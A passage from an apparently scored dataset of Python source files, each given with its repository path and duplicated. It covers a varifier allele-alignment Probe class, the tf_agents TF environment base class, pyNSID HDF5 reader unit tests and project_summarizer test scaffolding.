return padded_seq, padded_mask
def padded_seq_allele_start_end_coords(self, padded_seq):
position = 0
allele_start = None
for index, base in enumerate(padded_seq):
if base != "-":
if position == self.allele_start:
allele_start = index
if position == self.allele_end:
return allele_start, index
position += 1
return None, None
def edit_distance_vs_ref(self, map_hit, ref_seq, ref_mask=None):
padded_probe_seq, _ = self.padded_probe_or_ref_seq(map_hit)
padded_ref_seq, padded_ref_mask = self.padded_probe_or_ref_seq(
map_hit, ref_seq=ref_seq, ref_mask=ref_mask
)
start, end = self.padded_seq_allele_start_end_coords(padded_probe_seq)
if start == None:
return -1, False
probe_allele = padded_probe_seq[start : end + 1]
ref_allele = padded_ref_seq[start : end + 1]
if ref_mask is None:
in_mask = False
else:
in_mask = any(padded_ref_mask[start : end + 1])
return (
edit_distance.edit_distance_from_aln_strings(probe_allele, ref_allele),
in_mask,
) | varifier/probe.py | import pyfastaq
from varifier import edit_distance
class Probe:
def __init__(self, seq, allele_start, allele_end):
self.seq = seq
self.allele_start = allele_start
self.allele_end = allele_end
def __str__(self):
return f"{self.seq} {self.allele_start} {self.allele_end}"
def __eq__(self, other):
return type(other) is type(self) and self.__dict__ == other.__dict__
def allele_seq(self):
return self.seq[self.allele_start : self.allele_end + 1]
def map_hit_includes_allele(self, map_hit):
if map_hit.strand == -1:
start = len(self.seq) - map_hit.q_en
end = len(self.seq) - map_hit.q_st
else:
start = map_hit.q_st
end = map_hit.q_en
return start < self.allele_start and self.allele_end < end
def allele_match_counts(self, map_hit):
"""Given a mappy minimap2 hit, works out how many positions in the
alignment between the allele and the reference match.
Returns a tuple: (matching bases, total positions).
The minimap2 hit must have the extended cigar string, not the 'normal'
cigar string."""
if map_hit.NM == 0:
l = self.allele_end - self.allele_start + 1
return l, l
# If there are mismatches, then we can use the extended cigar string to
# work out how many of those mismatches are in the allele.
# Example cigar to remind which way round I and D are:
# read: AGT--TGATCAAGTAC
# ref: AGTGATGATC----AC
# cigar: 3M2D5M4I2M
probe_pos = map_hit.q_st
total_positions = 0
matches = 0
if map_hit.strand == -1:
map_hit.cigar.reverse()
for length, operator in map_hit.cigar:
if probe_pos > self.allele_end:
break
if operator == 7 or operator == 8: # 7,8 are "=","X" == match/mismatch
for i in range(length):
if self.allele_start <= probe_pos <= self.allele_end:
if operator == 7:
matches += 1
total_positions += 1
probe_pos += 1
if probe_pos > self.allele_end:
break
elif operator == 1: # 1 = I = insertion
if self.allele_start <= probe_pos <= self.allele_end:
total_positions += length
probe_pos += length
elif operator == 2: # 2 = D = deletion
if self.allele_start <= probe_pos <= self.allele_end:
total_positions += length
else:
raise RuntimeError(
f"Unexpected cigar operator number {operator} with length {length} from cigar"
)
if map_hit.strand == -1:
map_hit.cigar.reverse()
return matches, total_positions
def padded_probe_or_ref_seq(self, map_hit, ref_seq=None, ref_mask=None):
"""Returns a tuple: (padded seq string, mask list of bools).
padded seq string is the padded probe seq inferred from map_hit, or
if ref_seq provided then the padded ref seq matching the probe.
If ref_mask is given, should be a set of positions in the mask.
The returned mask list of bools is same length as the returned padded
seq string, and has True or False for whether each position is in the mask"""
# Cigar operators:
# 1 I Insertion in query (pad in ref)
# 2 D Deletion in query (pad in query)
# 7 = Match
# 8 X Mismatch
if map_hit.strand == -1:
q_st = len(self.seq) - map_hit.q_en
else:
q_st = map_hit.q_st
padded_seq = []
padded_mask = []
if ref_seq is None:
assert ref_mask is None
ref_seq = self.seq
pad_operators = {2}
non_pad_operators = {1, 7, 8}
if map_hit.strand == -1:
ref_seq = pyfastaq.sequences.Fasta("probe", self.seq)
ref_seq.revcomp()
position = q_st
else:
pad_operators = {1}
non_pad_operators = {2, 7, 8}
position = map_hit.r_st
for operator_length, operator_type in map_hit.cigar:
if operator_type in pad_operators:
padded_seq.append("-" * operator_length)
if ref_mask is not None:
padded_mask.extend([False] * operator_length)
elif operator_type in non_pad_operators:
padded_seq.append(ref_seq[position : position + operator_length])
if ref_mask is not None:
for i in range(position, position + operator_length):
padded_mask.append(i in ref_mask)
position += operator_length
else:
raise RuntimeError(
f"Unexpected cigar operator number {operator_type} with length {operator_length} from cigar"
)
if map_hit.strand == -1:
padded_seq.extend(["N"] * map_hit.q_st)
padded_seq = pyfastaq.sequences.Fasta("seq", "".join(padded_seq))
padded_seq.revcomp()
padded_seq = padded_seq.seq
if ref_mask is not None:
padded_mask.extend([False] * map_hit.q_st)
padded_mask.reverse()
else:
padded_seq = "".join(["N"] * map_hit.q_st + padded_seq)
if ref_mask is not None:
padded_mask = [False] * map_hit.q_st + padded_mask
if ref_mask is None:
padded_mask = [False] * len(padded_seq)
assert len(padded_seq) == len(padded_mask)
return padded_seq, padded_mask
def padded_seq_allele_start_end_coords(self, padded_seq):
position = 0
allele_start = None
for index, base in enumerate(padded_seq):
if base != "-":
if position == self.allele_start:
allele_start = index
if position == self.allele_end:
return allele_start, index
position += 1
return None, None
def edit_distance_vs_ref(self, map_hit, ref_seq, ref_mask=None):
padded_probe_seq, _ = self.padded_probe_or_ref_seq(map_hit)
padded_ref_seq, padded_ref_mask = self.padded_probe_or_ref_seq(
map_hit, ref_seq=ref_seq, ref_mask=ref_mask
)
start, end = self.padded_seq_allele_start_end_coords(padded_probe_seq)
if start == None:
return -1, False
probe_allele = padded_probe_seq[start : end + 1]
ref_allele = padded_ref_seq[start : end + 1]
if ref_mask is None:
in_mask = False
else:
in_mask = any(padded_ref_mask[start : end + 1])
return (
edit_distance.edit_distance_from_aln_strings(probe_allele, ref_allele),
in_mask,
) | 0.695855 | 0.267199 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class Base(object):
"""Abstract base class for TF RL environments.
The `current_time_step()` method returns current `time_step`, resetting the
environment if necessary.
The `step(action)` method applies the action and returns the new `time_step`.
This method will also reset the environment if needed and ignore the action in
that case.
The `reset()` method returns `time_step` that results from an environment
reset and is guaranteed to have step_type=ts.FIRST
The `reset()` is only needed for explicit resets, in general the Environment
will reset automatically when needed, for example, when no episode was started
or when stepped after the end of the episode was reached
(i.e. step_type=ts.LAST).
Example for collecting an episode in Eager mode:
tf_env = TFEnvironment()
# reset() creates the initial time_step and resets the Environment.
time_step = tf_env.reset()
while not time_step.is_last():
action_step = policy.action(time_step)
time_step = tf_env.step(action_step.action)
Example of simple use in Graph Mode:
tf_env = TFEnvironment()
# current_time_step() creates the initial TimeStep.
time_step = tf_env.current_time_step()
action_step = policy.action(time_step)
# It applies the action and returns the new TimeStep.
next_time_step = tf_env.step(action_step.action)
sess.run([time_step, action_step, next_time_step])
Example with explicit resets in Graph-Mode:
reset_op = tf_env.reset()
time_step = tf_env.current_time_step()
action_step = policy.action(time_step)
# It applies the action and returns the new TimeStep.
next_time_step = tf_env.step(action_step.action)
# The Environment will initialize before starting.
sess.run([time_step, action_step, next_time_step])
# This will force reset the Environment.
sess.run(reset_op)
# This will apply a new action in the Environment.
sess.run([time_step, action_step, next_time_step])
Example of random actions in Graph mode:
tf_env = TFEnvironment()
# The action needs to depend on time_step using control_dependencies.
time_step = tf_env.current_time_step()
with tf.control_dependencies([time_step.step_type]):
action = tensor_spec.sample_bounded_spec(tf_env.action_spec())
next_time_step = tf_env.step(action)
sess.run([timestep, action, next_timestep])
Example of collecting full episodes with a while_loop:
tf_env = TFEnvironment()
# reset() creates the initial time_step
time_step = tf_env.reset()
c = lambda t: tf.logical_not(t.is_last())
body = lambda t: [tf_env.step(t.observation)]
final_time_step = tf.while_loop(c, body, [time_step])
sess.run(final_time_step)
"""
def __init__(self, time_step_spec=None, action_spec=None, batch_size=1):
"""Meant to be called by subclass constructors.
Args:
time_step_spec: A `TimeStep` namedtuple containing `TensorSpec`s
defining the tensors returned by
`step()` (step_type, reward, discount, and observation).
action_spec: A nest of BoundedTensorSpec representing the actions of the
environment.
batch_size: The batch size expected for the actions and observations.
"""
self._time_step_spec = time_step_spec
self._action_spec = action_spec
self._batch_size = batch_size
@abc.abstractmethod
def current_time_step(self):
"""Returns the current `TimeStep`.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
@abc.abstractmethod
def reset(self):
"""Resets the environment and returns the current_time_step.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
@abc.abstractmethod
def step(self, action):
"""Steps the environment according to the action.
If the environment returned a `TimeStep` with `StepType.LAST` at the
previous step, this call to `step` will start a new sequence and `action`
will be ignored.
This method will also start a new sequence if called after the environment
has been constructed and `reset` has not been called. In this case
`action` will be ignored.
Expected sequences look like:
time_step -> action -> next_time_step
The action should depend on the previous time_step for correctness.
Args:
action: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `action_spec()`.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
def render(self):
"""Renders a frame from the environment.
Raises:
NotImplementedError: If the environment does not support rendering.
"""
raise NotImplementedError('No rendering support.')
def time_step_spec(self):
"""Describes the `TimeStep` tensors returned by `step()`.
Returns:
A `TimeStep` namedtuple containing `TensorSpec`s defining the tensors
returned by `step()` (step_type, reward, discount, and observation).
"""
return self._time_step_spec
def action_spec(self):
"""Describes the TensorSpecs of the Tensors expected by `step(action)`.
`action` can be a single Tensor, or a nested dict, list or tuple of
Tensors.
Returns:
An single TensorSpec, or a nested dict, list or tuple of
`TensorSpec` objects, which describe the shape and
dtype of each Tensor expected by `step()`.
"""
return self._action_spec
def observation_spec(self):
"""Defines the TensorSpec of observations provided by the environment.
Returns:
Same structure as returned by `time_step_spec().observation`.
"""
return self.time_step_spec().observation
@property
def batched(self):
return True
@property
def batch_size(self):
return self._batch_size | tf_agents/environments/tf_environment.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class Base(object):
"""Abstract base class for TF RL environments.
The `current_time_step()` method returns current `time_step`, resetting the
environment if necessary.
The `step(action)` method applies the action and returns the new `time_step`.
This method will also reset the environment if needed and ignore the action in
that case.
The `reset()` method returns `time_step` that results from an environment
reset and is guaranteed to have step_type=ts.FIRST
The `reset()` is only needed for explicit resets, in general the Environment
will reset automatically when needed, for example, when no episode was started
or when stepped after the end of the episode was reached
(i.e. step_type=ts.LAST).
Example for collecting an episode in Eager mode:
tf_env = TFEnvironment()
# reset() creates the initial time_step and resets the Environment.
time_step = tf_env.reset()
while not time_step.is_last():
action_step = policy.action(time_step)
time_step = tf_env.step(action_step.action)
Example of simple use in Graph Mode:
tf_env = TFEnvironment()
# current_time_step() creates the initial TimeStep.
time_step = tf_env.current_time_step()
action_step = policy.action(time_step)
# It applies the action and returns the new TimeStep.
next_time_step = tf_env.step(action_step.action)
sess.run([time_step, action_step, next_time_step])
Example with explicit resets in Graph-Mode:
reset_op = tf_env.reset()
time_step = tf_env.current_time_step()
action_step = policy.action(time_step)
# It applies the action and returns the new TimeStep.
next_time_step = tf_env.step(action_step.action)
# The Environment will initialize before starting.
sess.run([time_step, action_step, next_time_step])
# This will force reset the Environment.
sess.run(reset_op)
# This will apply a new action in the Environment.
sess.run([time_step, action_step, next_time_step])
Example of random actions in Graph mode:
tf_env = TFEnvironment()
# The action needs to depend on time_step using control_dependencies.
time_step = tf_env.current_time_step()
with tf.control_dependencies([time_step.step_type]):
action = tensor_spec.sample_bounded_spec(tf_env.action_spec())
next_time_step = tf_env.step(action)
sess.run([timestep, action, next_timestep])
Example of collecting full episodes with a while_loop:
tf_env = TFEnvironment()
# reset() creates the initial time_step
time_step = tf_env.reset()
c = lambda t: tf.logical_not(t.is_last())
body = lambda t: [tf_env.step(t.observation)]
final_time_step = tf.while_loop(c, body, [time_step])
sess.run(final_time_step)
"""
def __init__(self, time_step_spec=None, action_spec=None, batch_size=1):
"""Meant to be called by subclass constructors.
Args:
time_step_spec: A `TimeStep` namedtuple containing `TensorSpec`s
defining the tensors returned by
`step()` (step_type, reward, discount, and observation).
action_spec: A nest of BoundedTensorSpec representing the actions of the
environment.
batch_size: The batch size expected for the actions and observations.
"""
self._time_step_spec = time_step_spec
self._action_spec = action_spec
self._batch_size = batch_size
@abc.abstractmethod
def current_time_step(self):
"""Returns the current `TimeStep`.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
@abc.abstractmethod
def reset(self):
"""Resets the environment and returns the current_time_step.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
@abc.abstractmethod
def step(self, action):
"""Steps the environment according to the action.
If the environment returned a `TimeStep` with `StepType.LAST` at the
previous step, this call to `step` will start a new sequence and `action`
will be ignored.
This method will also start a new sequence if called after the environment
has been constructed and `reset` has not been called. In this case
`action` will be ignored.
Expected sequences look like:
time_step -> action -> next_time_step
The action should depend on the previous time_step for correctness.
Args:
action: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `action_spec()`.
Returns:
A `TimeStep` namedtuple containing:
step_type: A `StepType` value.
reward: Reward at this timestep.
discount: A discount in the range [0, 1].
observation: A Tensor, or a nested dict, list or tuple of Tensors
corresponding to `observation_spec()`.
"""
def render(self):
"""Renders a frame from the environment.
Raises:
NotImplementedError: If the environment does not support rendering.
"""
raise NotImplementedError('No rendering support.')
def time_step_spec(self):
"""Describes the `TimeStep` tensors returned by `step()`.
Returns:
A `TimeStep` namedtuple containing `TensorSpec`s defining the tensors
returned by `step()` (step_type, reward, discount, and observation).
"""
return self._time_step_spec
def action_spec(self):
"""Describes the TensorSpecs of the Tensors expected by `step(action)`.
`action` can be a single Tensor, or a nested dict, list or tuple of
Tensors.
Returns:
An single TensorSpec, or a nested dict, list or tuple of
`TensorSpec` objects, which describe the shape and
dtype of each Tensor expected by `step()`.
"""
return self._action_spec
def observation_spec(self):
"""Defines the TensorSpec of observations provided by the environment.
Returns:
Same structure as returned by `time_step_spec().observation`.
"""
return self.time_step_spec().observation
@property
def batched(self):
return True
@property
def batch_size(self):
return self._batch_size | 0.946448 | 0.572842 |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import sys
import unittest
import tempfile
from typing import Type, Tuple
import h5py
import numpy as np
from sidpy import Dataset, Dimension
sys.path.append("../pyNSID/")
from pyNSID.io.hdf_io import write_nsid_dataset
from pyNSID.io.hdf_utils import find_dataset
from pyNSID.io.nsi_reader import NSIDReader
def create_h5group(h5f_name: str, h5g_name: str) -> h5py.Group:
    """Create a new group in an HDF5 file and return it.

    The file is opened in append mode (``'r+'``) when it already exists,
    otherwise it is created (``'w'``).  The file handle is intentionally
    left open: the returned group keeps a reference to the open file,
    and the tests need the file to remain writable.

    Parameters
    ----------
    h5f_name : str
        Path to the HDF5 file.
    h5g_name : str
        Name of the group to create.

    Returns
    -------
    h5py.Group
        The newly created group instance.  (The original annotation
        ``Type[h5py.Group]`` incorrectly described the class object
        rather than an instance.)
    """
    mode = 'r+' if os.path.exists(h5f_name) else 'w'
    h5_f = h5py.File(h5f_name, mode)
    return h5_f.create_group(h5g_name)
def write_dummy_dset(hf_group: h5py.Group, dims: Tuple[int, ...],
                     main_name: str, **kwargs) -> None:
    """Write a random sidpy ``Dataset`` of shape ``dims`` into ``hf_group``.

    Parameters
    ----------
    hf_group : h5py.Group
        Open HDF5 group to write into.  (The original annotation
        ``Type[h5py.Group]`` described the class, not an instance;
        likewise ``Tuple[int]`` meant a 1-tuple — ``Tuple[int, ...]``
        is the intended "any-length tuple of ints".)
    dims : Tuple[int, ...]
        Shape of the random data to generate.
    main_name : str
        Name to store the main dataset under.
    **kwargs
        ``dnames`` (optional): per-axis dimension labels; defaults to
        ``0, 1, ...`` matching the axis index.
    """
    dset = Dataset.from_array(
        np.random.random([*dims]), name="new")
    # Dimension labels default to the axis index unless overridden.
    dnames = kwargs.get("dnames", np.arange(len(dims)))
    for i, d in enumerate(dims):
        dset.set_dimension(i, Dimension(np.arange(d), str(dnames[i])))
    write_nsid_dataset(
        dset, hf_group, main_data_name=main_name)
def get_dset(hf_path: str, dset_name: str) -> h5py.Dataset:
    """Return the first dataset named ``dset_name`` found in an HDF5 file.

    The file handle is deliberately not closed: closing it would
    invalidate the returned ``h5py.Dataset`` object.  (The original
    annotation ``Type[h5py.Dataset]`` incorrectly described the class
    object rather than an instance.)

    Parameters
    ----------
    hf_path : str
        Path to the HDF5 file; opened read-only.
    dset_name : str
        Name of the dataset to locate via ``find_dataset``.
    """
    hf = h5py.File(hf_path, 'r')
    return find_dataset(hf, dset_name)[0]
class TestNsidReaderNoDatasets(unittest.TestCase):
    """Planned tests for NSIDReader on files containing no NSID datasets.

    The test bodies have not been written yet.  Each placeholder is
    explicitly skipped so the suite reports it as TODO instead of
    counting a vacuous ``pass`` as a passing test.
    """

    def test_not_hdf5_file(self):
        self.skipTest("TODO: not implemented")

    def setUp(self) -> None:
        pass

    def tearDown(self) -> None:
        pass

    def test_can_read_fails(self):
        self.skipTest("TODO: not implemented")

    def test_read_returns_nothing(self):
        self.skipTest("TODO: not implemented")

    def test_read_all_no_parent(self):
        self.skipTest("TODO: not implemented")
class TestNsidReaderSingleDataset(unittest.TestCase):
    """Planned tests for NSIDReader on a file holding one main dataset.

    The test bodies have not been written yet.  Each placeholder is
    explicitly skipped so the suite reports it as TODO instead of
    counting a vacuous ``pass`` as a passing test.
    """

    def setUp(self) -> None:
        pass

    def tearDown(self) -> None:
        pass

    def test_can_read_passes(self):
        self.skipTest("TODO: not implemented")

    def test_read_no_object_specified(self):
        self.skipTest("TODO: not implemented")

    def test_read_invalid_dtype_for_object(self):
        self.skipTest("TODO: not implemented")

    def test_read_object_in_different_file(self):
        self.skipTest("TODO: not implemented")

    def test_read_correct_main_dset(self):
        self.skipTest("TODO: not implemented")

    def test_read_group_containing_main_dset(self):
        self.skipTest("TODO: not implemented")

    def test_read_all_no_parent(self):
        self.skipTest("TODO: not implemented")

    def test_read_all_parent_specified(self):
        self.skipTest("TODO: not implemented")

    def test_read_invalid_dtype_for_parent(self):
        self.skipTest("TODO: not implemented")

    def test_read_parent_in_different_file(self):
        self.skipTest("TODO: not implemented")
class TestNsidReaderMultipleDatasets(unittest.TestCase):
    """Planned tests for NSIDReader on a file holding several datasets.

    The test bodies have not been written yet.  Each placeholder is
    explicitly skipped so the suite reports it as TODO instead of
    counting a vacuous ``pass`` as a passing test.
    """

    def setUp(self) -> None:
        pass

    def tearDown(self) -> None:
        pass

    def test_can_read_passes(self):
        self.skipTest("TODO: not implemented")

    def test_read_no_object_specified(self):
        self.skipTest("TODO: not implemented")

    def test_read_correct_main_dset(self):
        self.skipTest("TODO: not implemented")

    def test_read_group_containing_main_dset(self):
        self.skipTest("TODO: not implemented")

    def test_read_all_no_parent(self):
        self.skipTest("TODO: not implemented")

    def test_read_all_parent_specified(self):
        self.skipTest("TODO: not implemented")
class TestOldTests(unittest.TestCase):
    """Legacy integration tests exercising NSIDReader end to end.

    Each test builds a real HDF5 file (``test.hdf5``) in the working
    directory via the module-level helpers, and ``tearDown`` removes it.
    Tests call ``self.tearDown()`` up front to clear any file left over
    from an earlier, aborted run.
    """

    def test_can_read(self) -> None:
        hf_name = "test.hdf5"
        self.tearDown()
        # group1 is created but left empty: a file with groups but no
        # NSID main dataset must not be readable.
        h5group_1 = create_h5group(hf_name, "group1")
        self.assertFalse(NSIDReader(hf_name).can_read())
        # Adding one main dataset makes the file readable.
        h5group_2 = create_h5group(hf_name, "group2")
        write_dummy_dset(h5group_2, (10, 10, 5), "dset")
        self.assertTrue(NSIDReader(hf_name).can_read())

    def test_read_single(self) -> None:
        hf_name = "test.hdf5"
        self.tearDown()
        h5group = create_h5group(hf_name, "group")
        write_dummy_dset(h5group, (10, 10, 5), "dset")
        # NOTE(review): `dset` is unused, but get_dset opens the file
        # read-only as a side effect — kept as-is to preserve behavior.
        dset = get_dset(hf_name, "dset")
        reader = NSIDReader(hf_name)
        d1 = reader.read(h5group)  # read via the parent group
        d2 = reader.read()         # read with no object specified
        self.assertTrue(isinstance(d1[0], Dataset))
        self.assertTrue(isinstance(d2, list))
        self.assertTrue(isinstance(d2[0], Dataset))

    def test_read_multi(self) -> None:
        hf_name = "test.hdf5"
        self.tearDown()
        h5group = create_h5group(hf_name, "group")
        # Three datasets with distinct last-axis sizes (5, 6, 7) and
        # non-overlapping dimension labels.
        for i in range(3):
            write_dummy_dset(
                h5group, (10, 10, 5+i),
                "dset{}".format(i),
                dnames=np.arange(3*i, 3*(i+1)))
        reader = NSIDReader(hf_name)
        d_all = reader.read()
        self.assertTrue(isinstance(d_all, list))
        self.assertEqual(len(d_all), 3)
        self.assertEqual(sum([1 for d in d_all if isinstance(d, Dataset)]), 3)
        # Reading each dataset object directly returns that dataset,
        # identified here by its unique last-axis size.
        for i in range(3):
            dset_i = get_dset(hf_name, "dset{}".format(i))
            d_i = reader.read(dset_i)
            self.assertEqual(d_i.shape[-1], 5+i)

    def test_read_all(self) -> None:
        hf_name = "test.hdf5"
        self.tearDown()
        h5group_1 = create_h5group(hf_name, "group1")
        h5group_2 = create_h5group(hf_name, "group2")
        # Write multiple datasets to the first group
        for i in range(5):
            write_dummy_dset(
                h5group_1, (10, 10, 5),
                "dset{}".format(i),
                dnames=np.arange(3*i, 3*(i+1)))
        # write a single dataset to the second group
        write_dummy_dset(h5group_2, (7, 7, 10), "dset")
        # initialize and test reader
        reader = NSIDReader(hf_name)
        d_all = reader.read_all(recursive=True)
        self.assertEqual(len(d_all), 6)
        self.assertEqual(sum([1 for d in d_all if isinstance(d, Dataset)]), 6)
        # NOTE(review): group2 holds only one dataset, yet 6 results are
        # expected — presumably read_all(recursive=True) traverses from
        # the file root regardless of `parent`; confirm this is intended.
        d = reader.read_all(recursive=True, parent=h5group_2)
        self.assertEqual(len(d), 6)
        self.assertTrue(isinstance(d[0], Dataset))

    def tearDown(self, fname: str = 'test.hdf5') -> None:
        # Best-effort cleanup of the scratch file between tests.
        if os.path.exists(fname):
            os.remove(fname)
unicode_literals)
import os
import sys
import unittest
import tempfile
from typing import Type, Tuple
import h5py
import numpy as np
from sidpy import Dataset, Dimension
sys.path.append("../pyNSID/")
from pyNSID.io.hdf_io import write_nsid_dataset
from pyNSID.io.hdf_utils import find_dataset
from pyNSID.io.nsi_reader import NSIDReader
def create_h5group(h5f_name: str, h5g_name: str) -> Type[h5py.Group]:
mode = 'r+' if os.path.exists(h5f_name) else 'w'
h5_f = h5py.File(h5f_name, mode)
h5_group = h5_f.create_group(h5g_name)
return h5_group
def write_dummy_dset(hf_group: Type[h5py.Group], dims: Tuple[int],
main_name: str, **kwargs) -> None:
dset = Dataset.from_array(
np.random.random([*dims]), name="new")
dnames = kwargs.get("dnames", np.arange(len(dims)))
for i, d in enumerate(dims):
dset.set_dimension(i, Dimension(np.arange(d), str(dnames[i])))
write_nsid_dataset(
dset, hf_group, main_data_name=main_name)
def get_dset(hf_path: str, dset_name: str) -> Type[h5py.Dataset]:
hf = h5py.File(hf_path, 'r')
dset = find_dataset(hf, dset_name)[0]
return dset
class TestNsidReaderNoDatasets(unittest.TestCase):
def test_not_hdf5_file(self):
pass
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_can_read_fails(self):
pass
def test_read_returns_nothing(self):
pass
def test_read_all_no_parent(self):
pass
class TestNsidReaderSingleDataset(unittest.TestCase):
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_can_read_passes(self):
pass
def test_read_no_object_specified(self):
pass
def test_read_invalid_dtype_for_object(self):
pass
def test_read_object_in_different_file(self):
pass
def test_read_correct_main_dset(self):
pass
def test_read_group_containing_main_dset(self):
pass
def test_read_all_no_parent(self):
pass
def test_read_all_parent_specified(self):
pass
def test_read_invalid_dtype_for_parent(self):
pass
def test_read_parent_in_different_file(self):
pass
class TestNsidReaderMultipleDatasets(unittest.TestCase):
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_can_read_passes(self):
pass
def test_read_no_object_specified(self):
pass
def test_read_correct_main_dset(self):
pass
def test_read_group_containing_main_dset(self):
pass
def test_read_all_no_parent(self):
pass
def test_read_all_parent_specified(self):
pass
class TestOldTests(unittest.TestCase):
def test_can_read(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group_1 = create_h5group(hf_name, "group1")
self.assertFalse(NSIDReader(hf_name).can_read())
h5group_2 = create_h5group(hf_name, "group2")
write_dummy_dset(h5group_2, (10, 10, 5), "dset")
self.assertTrue(NSIDReader(hf_name).can_read())
def test_read_single(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group = create_h5group(hf_name, "group")
write_dummy_dset(h5group, (10, 10, 5), "dset")
dset = get_dset(hf_name, "dset")
reader = NSIDReader(hf_name)
d1 = reader.read(h5group)
d2 = reader.read()
self.assertTrue(isinstance(d1[0], Dataset))
self.assertTrue(isinstance(d2, list))
self.assertTrue(isinstance(d2[0], Dataset))
def test_read_multi(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group = create_h5group(hf_name, "group")
for i in range(3):
write_dummy_dset(
h5group, (10, 10, 5+i),
"dset{}".format(i),
dnames=np.arange(3*i, 3*(i+1)))
reader = NSIDReader(hf_name)
d_all = reader.read()
self.assertTrue(isinstance(d_all, list))
self.assertEqual(len(d_all), 3)
self.assertEqual(sum([1 for d in d_all if isinstance(d, Dataset)]), 3)
for i in range(3):
dset_i = get_dset(hf_name, "dset{}".format(i))
d_i = reader.read(dset_i)
self.assertEqual(d_i.shape[-1], 5+i)
def test_read_all(self) -> None:
hf_name = "test.hdf5"
self.tearDown()
h5group_1 = create_h5group(hf_name, "group1")
h5group_2 = create_h5group(hf_name, "group2")
# Write multiple datasets to the first group
for i in range(5):
write_dummy_dset(
h5group_1, (10, 10, 5),
"dset{}".format(i),
dnames=np.arange(3*i, 3*(i+1)))
# write a single dataset to the second group
write_dummy_dset(h5group_2, (7, 7, 10), "dset")
# initialize and test reader
reader = NSIDReader(hf_name)
d_all = reader.read_all(recursive=True)
self.assertEqual(len(d_all), 6)
self.assertEqual(sum([1 for d in d_all if isinstance(d, Dataset)]), 6)
d = reader.read_all(recursive=True, parent=h5group_2)
self.assertEqual(len(d), 6)
self.assertTrue(isinstance(d[0], Dataset))
def tearDown(self, fname: str = 'test.hdf5') -> None:
if os.path.exists(fname):
os.remove(fname) | 0.541894 | 0.299726 |
import os
import sys
import tempfile
from test.pytest_execute import InProcessExecution
from project_summarizer.__main__ import main
from project_summarizer.main import ProjectSummarizer
JUNIT_COMMAND_LINE_FLAG = "--junit"
COBERTURA_COMMAND_LINE_FLAG = "--cobertura"
PUBLISH_COMMAND_LINE_FLAG = "--publish"
ONLY_CHANGES_COMMAND_LINE_FLAG = "--only-changes"
REPORT_DIRECTORY = "report"
PUBLISH_DIRECTORY = "publish"
JUNIT_RESULTS_FILE_NAME = "tests.xml"
RESULTS_SUMMARY_FILE_NAME = "test-results.json"
COVERAGE_SUMMARY_FILE_NAME = "coverage.json"
__COBERTURA_COVERAGE_FILE_NAME = "coverage.xml"
__COBERTURA_NON_WINDOWS_COVERAGE_FILE_NAME = "coverage-non-windows.xml"
def get_coverage_file_name():
"""
Get the coverage file for the specific operating system class.
This is needed as Windows uses a different file name hierarchy than the others.
"""
if sys.platform.startswith("win"):
return __COBERTURA_COVERAGE_FILE_NAME
return __COBERTURA_NON_WINDOWS_COVERAGE_FILE_NAME
class MainlineExecutor(InProcessExecution):
"""
Class to provide for a local instance of a InProcessExecution class.
"""
def __init__(self, use_module=False, use_main=False):
super().__init__()
self.__use_main = use_main
self.__entry_point = "__main.py__" if use_module else "main.py"
resource_directory = os.path.join(os.getcwd(), "test", "resources")
assert os.path.exists(resource_directory)
assert os.path.isdir(resource_directory)
self.resource_directory = resource_directory
def execute_main(self):
if self.__use_main:
main()
else:
ProjectSummarizer().main()
def get_main_name(self):
return self.__entry_point
def test_get_summarizer_version():
"""
Make sure that we can get information about the version of the summarizer.
"""
# Arrange
executor = MainlineExecutor()
suppplied_arguments = ["--version"]
expected_output = """\
main.py 0.5.0
"""
expected_error = ""
expected_return_code = 0
# Act
execute_results = executor.invoke_main(arguments=suppplied_arguments, cwd=None)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
# pylint: disable=consider-using-with
def setup_directories(
create_report_directory=True,
create_publish_directory=False,
temporary_work_directory=None,
):
"""
Setup a temporary directory, a report directory under it (created if necessary),
and the publish directory (not created by default if necessary).
"""
if not temporary_work_directory:
temporary_work_directory = tempfile.TemporaryDirectory()
report_directory = os.path.join(temporary_work_directory.name, "report")
if create_report_directory:
os.makedirs(report_directory)
publish_directory = os.path.join(temporary_work_directory.name, "publish")
if create_publish_directory:
os.makedirs(publish_directory)
return temporary_work_directory, report_directory, publish_directory
# pylint: enable=consider-using-with | test/test_scenarios.py | import os
import sys
import tempfile
from test.pytest_execute import InProcessExecution
from project_summarizer.__main__ import main
from project_summarizer.main import ProjectSummarizer
JUNIT_COMMAND_LINE_FLAG = "--junit"
COBERTURA_COMMAND_LINE_FLAG = "--cobertura"
PUBLISH_COMMAND_LINE_FLAG = "--publish"
ONLY_CHANGES_COMMAND_LINE_FLAG = "--only-changes"
REPORT_DIRECTORY = "report"
